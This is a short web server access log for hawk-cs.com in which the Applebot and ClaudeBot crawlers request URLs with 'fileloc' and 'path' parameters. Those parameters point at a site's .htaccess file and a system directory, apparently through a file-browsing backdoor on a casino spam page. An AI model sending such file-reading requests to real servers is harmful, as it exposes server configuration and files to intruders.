17.246.15.0 - - [22/Mar/2026:01:21:37 -0400] "GET /geld-machen-im-online-casino-in-der-schweiz-2025/?fileloc=/homepages/38/d1014936368/htdocs/clickandbuilds/HawkConstruction/.htaccess&path=/homepages/38/d1014936368/htdocs/clickandbuilds/HawkConstruction HTTP/1.1" 200 14678 hawk-cs.com "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4 Safari/605.1.15 (Applebot/0.1; +http://www.apple.com/go/applebot)" "-"
216.73.216.0 - - [22/Mar/2026:01:21:39 -0400] "GET /?fileloc=%2F%2Fusr%2Fshare%2Fbug%2Flibmagickwand-6.q16-6%2Fscript&path=%2F%2Fusr%2Fshare%2Fbug%2Flibmagickwand-6.q16-6 HTTP/1.1" 200 13061 www.hawk-cs.com "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-"
